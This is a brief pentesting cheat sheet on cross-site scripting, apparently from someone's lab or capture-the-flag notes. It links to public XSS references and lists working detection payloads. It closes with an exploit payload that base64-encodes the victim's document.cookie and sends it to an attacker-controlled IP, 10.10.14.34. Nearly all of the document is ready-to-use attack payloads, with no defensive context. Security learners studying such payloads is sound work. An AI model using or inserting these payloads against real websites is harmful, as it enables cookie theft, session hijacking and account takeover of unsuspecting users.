XSS (Cross-Site Scripting)

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md

Detect

<script>alert(1)</script>
<marquee onstart=alert(1)>XSS</marquee>
<img/src/onerror=location.href='http://10.10.14.34/XSS123'>

Exploit

Example of stealing victim cookies and send them to attack with http.

Replace ABCD with something random for each field to identify the injection point (and avoid cache)

<img/src/onerror=location.href='http://10.10.14.34/ABCD'+encodeURI(btoa(document.cookie))>